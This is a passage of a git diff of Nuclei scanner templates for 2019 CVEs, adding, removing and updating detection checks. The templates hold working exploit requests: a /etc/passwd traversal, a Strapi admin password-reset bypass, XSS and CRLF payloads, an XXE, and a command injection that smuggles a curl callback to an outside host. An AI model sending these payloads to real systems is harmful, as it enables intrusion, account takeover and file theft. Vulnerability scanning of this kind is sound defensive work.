+ - https://www.cvedetails.com/cve/CVE-2019-18665 + - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18665 + cwe-id: CWE-22 + tags: cve,cve2019,domos,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18818.yaml b/nuclei-templates/CVE-2019/CVE-2019-18818.yaml deleted file mode 100644 index b379bfbca6..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-18818.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2019-18818 -info: - name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset - author: idealphase - severity: critical - description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. - reference: - - https://github.com/advisories/GHSA-6xc2-mj39-q599 - - https://www.exploit-db.com/exploits/50239 - - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 - - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-18818 - cwe-id: CWE-640 - tags: cve,cve2019,strapi,auth-bypass,intrusive -requests: - - raw: - - | - POST /admin/auth/reset-password HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/json - - {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - part: header - - type: word - condition: and - words: - - '"username":' - - '"email":' - - '"jwt":' - part: body - extractors: - - type: json - json: - - .user.username - - .user.email - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18957.yaml b/nuclei-templates/CVE-2019/CVE-2019-18957.yaml index 5fc00dcf02..360420f04c 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-18957.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-18957.yaml @@ -6,19 +6,30 @@ info: severity: medium description: | MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. reference: - https://seclists.org/bugtraq/2019/Nov/23 - https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-18957 - remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. + - http://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html + - http://seclists.org/fulldisclosure/2019/Nov/4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-18957 cwe-id: CWE-79 - tags: cve2019,microstrategy,packetstorm,xss,seclists,cve + epss-score: 0.00375 + epss-percentile: 0.72231 + cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microstrategy + product: microstrategy_library + tags: cve,cve2019,microstrategy,packetstorm,xss,seclists -requests: +http: - method: GET path: - "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)" @@ -38,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/18 +# digest: 4a0a00473045022048cbc684424ad08cac660728cb7c8e3f5215e29ba815fdc4eff0d7eb372e3266022100e2f803accc5ac089bc651bc89b81d8b0c4e1411fdb6cd1adc5ec2e4479667cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1898.yaml b/nuclei-templates/CVE-2019/CVE-2019-1898.yaml index 79b4c34dac..c7493dedb0 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-1898.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-1898.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router. remediation: | Apply the latest firmware update provided by Cisco to fix the vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 epss-score: 0.07254 - epss-percentile: 0.93342 + epss-percentile: 0.93384 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true @@ -42,4 +44,4 @@ http: - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")' - 'contains(header, "application/octet-stream")' condition: and -# digest: 490a0046304402202d820be7cfa91e953acc3f6f1fb6df1585979a3cb1dc1ee9d81b74cae164cefe0220695b6ef51194ec93ec5cf0608a63a11ec0283d8db2a053f01919bf28305250ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022067f8931eeb97e0fbffc1398a800aa506accd3b190b654c90cf98eccafda48444022100d3f77b11e58945d5ba55c13e661a4a09440e9213c8b66cb3c5aca2899f208872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1943.yaml b/nuclei-templates/CVE-2019/CVE-2019-1943.yaml index 90d9ffd777..66ae291223 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-1943.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-1943.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the necessary patches or updates provided by Cisco to fix the open redirect vulnerability. reference: @@ -19,7 +21,7 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.03526 - epss-percentile: 0.90548 + epss-percentile: 0.90666 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,7 +30,7 @@ info: product: sg200-50_firmware shodan-query: "/config/log_off_page.htm" censys-query: "services.http.response.headers.location: /config/log_off_page.htm" - tags: cve,cve2023,redirect,cisco + tags: cve,cve2019,redirect,cisco http: - raw: @@ -51,4 +53,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022036da7769c4a66d3c88f2fedb971af8bbce50925fd97577463b875e68a5d4af1d022076d4d9d4d6cc272de3eb6be123cae186c0aa6732a63630f6951e639c3879a624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b096f24b4e9ce9ef0b364b53f3086ac37d7d62135469943a6d182818d3f7f050022100d2d82add8da52ca9ed1c66110a1d1057e75e1be2a6a9f2081892a8326a73a47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20085.yaml b/nuclei-templates/CVE-2019/CVE-2019-20085.yaml index 017846d59d..605d0be619 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-20085.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-20085.yaml @@ -1,22 +1,19 @@ id: CVE-2019-20085 info: - name: TVT NVMS 1000 - Local File Inclusion + name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high - description: | - TVT NVMS-1000 devices allow GET /.. local file inclusion attacks. + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal reference: - - https://www.exploit-db.com/exploits/48311 - - https://www.exploit-db.com/exploits/47774 - - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2019-20085 cwe-id: CWE-22 - tags: cve,cve2019,iot,lfi,kev requests: - method: GET @@ -26,12 +23,9 @@ requests: matchers-condition: and matchers: - type: regex - part: body regex: - "\\[(font|extension|file)s\\]" - + part: body - type: status status: - 200 - -# Enhanced by mp on 2022/06/10 diff --git a/nuclei-templates/CVE-2019/cve-2019-2725.yaml b/nuclei-templates/CVE-2019/CVE-2019-2725.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-2725.yaml rename to nuclei-templates/CVE-2019/CVE-2019-2725.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-2729.yaml b/nuclei-templates/CVE-2019/CVE-2019-2729.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-2729.yaml rename to nuclei-templates/CVE-2019/CVE-2019-2729.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-2767.yaml b/nuclei-templates/CVE-2019/CVE-2019-2767.yaml index 25f208ad14..bf1dcb703f 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-2767.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-2767.yaml @@ -1,4 +1,5 @@ id: CVE-2019-2767 + info: name: Oracle Business Intelligence - Publisher XXE author: madrobot @@ -7,17 +8,18 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-score: 7.20 cve-id: CVE-2019-2767 - tags: cve,cve2019,oracle,xxe,oast + requests: - raw: - | GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 Host: {{Hostname}} + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/nuclei-templates/CVE-2019/CVE-2019-3398.yaml b/nuclei-templates/CVE-2019/CVE-2019-3398.yaml index 8c2a0a6616..ddd0b6a263 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-3398.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-3398.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: @@ -19,14 +21,14 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97317 - epss-percentile: 0.99855 + epss-score: 0.97145 + epss-percentile: 0.99783 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: atlassian product: confluence - tags: packetstorm,cve,cve2019,atlassian,confluence,rce,authenticated,intrusive,kev + tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" @@ -81,4 +83,4 @@ http: - 'ta name="ajs\-draft\-id" content="([0-9]+)">' internal: true part: body -# digest: 490a0046304402203f0a588d6b84ed5fd8d7c6c79d6d940af15b791cac6f32f96b2ddb036ba4cf1d0220214c6399be8dd7a6e0b7e4882789b327e90038537e99da10271db578ffe11240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043ba35e864a4f273e70a587b37a6fa0d0c24dc0d708b756d462b0829909266040220220f314ba326bf955773daff7b02179da1e97126da43b517b8ad8d5e49756d61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-3401.yaml b/nuclei-templates/CVE-2019/CVE-2019-3401.yaml deleted file mode 100644 index 700ab9bafc..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-3401.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2019-3401 -info: - name: Atlassian JIRA Information Exposure (CVE-2019-3401) - author: TechbrunchFR,milo2012 - severity: medium - description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. - reference: - - https://jira.atlassian.com/browse/JRASERVER-69244 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-3401 - cwe-id: CWE-863 - tags: cve,cve2019,jira,atlassian,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - '' - - 'Manage Filters - Jira' - condition: and - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/nuclei-templates/CVE-2019/CVE-2019-3402.yaml b/nuclei-templates/CVE-2019/CVE-2019-3402.yaml new file mode 100644 index 0000000000..ce14735982 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-3402.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-3402 + +info: + name: Jira - Reflected XSS using searchOwnerUserName parameter. + author: pdteam + severity: medium + description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. + reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c + tags: cve,cve2019,atlassian,jira,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-3402 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-3799.yaml b/nuclei-templates/CVE-2019/CVE-2019-3799.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3799.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3799.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-3911.yaml b/nuclei-templates/CVE-2019/CVE-2019-3911.yaml index eee6c098ba..0d1bd780bb 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-3911.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-3911.yaml @@ -1,23 +1,34 @@ id: CVE-2019-3911 info: - name: LabKey Server < 18.3.0 - XSS + name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting author: princechaddha severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror parameter in the /__r2/query endpoints. + description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-03 - - https://www.cvedetails.com/cve/CVE-2019-3911 - metadata: - shodan-query: "Server: Labkey" - tags: cve,cve2019,xss,labkey + - https://nvd.nist.gov/vuln/detail/CVE-2019-3911 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2019-3911 cwe-id: CWE-79 + epss-score: 0.00195 + epss-percentile: 0.5643 + cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* + metadata: + max-request: 1 + vendor: labkey + product: labkey_server + shodan-query: 'Server: Labkey' + tags: cve,cve2019,xss,labkey,tenable -requests: +http: - method: GET path: - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL' @@ -37,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100b986602e44e57d8dd80c107ede7843f1cf0bb5790402f300905465fe2166ec9f022067793b03e1155326998b4f5f27ea33968571672da4690ab1a1238b9435488da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-3912.yaml b/nuclei-templates/CVE-2019/CVE-2019-3912.yaml deleted file mode 100644 index 6861b43f27..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-3912.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-3912 - -info: - name: LabKey Server < 18.3.0 - Open redirect - author: 0x_Akoko - severity: medium - description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites. - reference: - - https://www.tenable.com/security/research/tra-2019-03 - - https://www.cvedetails.com/cve/CVE-2019-3912 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-3912 - cwe-id: CWE-601 - metadata: - shodan-query: "Server: Labkey" - tags: cve,cve2019,redirect,labkey - -requests: - - method: GET - path: - - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2019/CVE-2019-3929.yaml b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml index 6c39d5fddb..4dd148b3e1 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-3929.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml @@ -1,6 +1,7 @@ id: CVE-2019-3929 + info: - name: Barco/AWIND OEM Presentation Platform - Remote Command Injection + name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) author: _0xf4n9x_ severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. @@ -8,25 +9,25 @@ info: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 - - https://www.tenable.com/security/research/tra-2019-20 + tags: rce,cve,cve2019,oast,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2019-3929 cwe-id: CWE-78 - tags: rce,cve,cve2019,oast,injection + requests: - method: POST path: - "{{BaseURL}}/cgi-bin/file_transfer.cgi" + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" headers: Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/cve-2019-5127.yaml b/nuclei-templates/CVE-2019/CVE-2019-5127.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-5127.yaml rename to nuclei-templates/CVE-2019/CVE-2019-5127.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-5434.yaml b/nuclei-templates/CVE-2019/CVE-2019-5434.yaml index df387d8a6e..aabe21db32 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-5434.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-5434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or upgrade to a newer version of Revive Adserver. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-5434 cwe-id: CWE-502 - epss-score: 0.28703 - epss-percentile: 0.9638 + epss-score: 0.3278 + epss-percentile: 0.96917 cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: revive-sas product: revive_adserver shodan-query: http.favicon.hash:106844876 - tags: edb,packetstorm,cve,cve2019,revive,adserver,rce + tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas http: - raw: @@ -58,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022002cfcc9959bf593642104dd6a46966cc381d8f714cb82e0194c6e3648082dca80220706cbd8ea9bcb3b7346207480e4ea34e53edbf71085e0599d213b475116bc9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d063d3e6f828763a627b1c547a29398d9d3271ba2577e671a648cfa9ffea26dd02207154351fd5498fdfc5b7bf9595690e8824b334442ccf2bbc53f4137aa14e6971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-6715.yaml b/nuclei-templates/CVE-2019/CVE-2019-6715.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-6715.yaml rename to nuclei-templates/CVE-2019/CVE-2019-6715.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-6799.yaml b/nuclei-templates/CVE-2019/CVE-2019-6799.yaml index 400d2d6903..697808948e 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-6799.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-6799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2019-6799 - epss-score: 0.13969 - epss-percentile: 0.95103 + epss-score: 0.1829 + epss-percentile: 0.96069 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +32,7 @@ info: shodan-query: title:"phpmyadmin" fofa-query: body="pma_servername" && body="4.8.4" hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive + tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: - raw: @@ -101,4 +103,4 @@ http: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header -# digest: 490a00463044022058ce9f355e6a14d3fd8f0d6403bd0dffd899817ada9a41d537446fc82d149b360220798311904c6e5beeed583e044df4efa69429c1b1428ec012fca57ca9a41a50af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f236d158d8c90c01829fc76b9cf88685ed1b1987354c5f52f456093e540f12a402200d0ba2a6199fd82fb2d4dbbf0d7ec82fab8b799702f0fc891d340211793ac723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-6802.yaml b/nuclei-templates/CVE-2019/CVE-2019-6802.yaml index 17c25558ee..256e3eeb8a 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-6802.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-6802.yaml @@ -1,32 +1,43 @@ id: CVE-2019-6802 info: - name: Pypiserver 1.2.5 - CRLF Injection + name: Pypiserver <1.2.5 - Carriage Return Line Feed Injection author: 0x_Akoko severity: medium description: | - CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI + Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI. + remediation: | + Upgrade to Pypiserver version 1.2.5 or later. reference: - https://vuldb.com/?id.130257 - - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 - https://github.com/pypiserver/pypiserver/issues/237 + - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-6802 - cwe-id: CWE-79,CWE-74 + cwe-id: CWE-74 + epss-score: 0.00113 + epss-percentile: 0.43845 + cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: python + product: pypiserver shodan-query: html:"pypiserver" - verified: "true" - tags: cve,cve2019,crlf,generic,pypiserver + tags: cve,cve2019,crlf,pypiserver,python -requests: +http: - method: GET path: - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" matchers: - - type: word + - type: regex part: header - words: - - 'Set-Cookie: crlfinjection=1;' + regex: + - "^Set-Cookie: crlfinjection=1;" +# digest: 4b0a00483046022100b16ea55a337e17fdeb0193ad059d9f3556559826d3d9b7110ec51f9e15d266d4022100ee15738e338dcc606c28c92349ff94f11a276dee860966f3e460c235495bda74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-7219.yaml b/nuclei-templates/CVE-2019/CVE-2019-7219.yaml deleted file mode 100644 index 76246d7d9a..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-7219.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-7219 -info: - name: Zarafa WebApp Reflected XSS - author: pdteam - severity: medium - description: | - Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. - reference: - - https://github.com/verifysecurity/CVE-2019-7219 - - https://stash.kopano.io/repos?visibility=public - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-7219 - cwe-id: CWE-79 - tags: cve,cve2019,zarafa,xss -requests: - - method: GET - path: - - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git 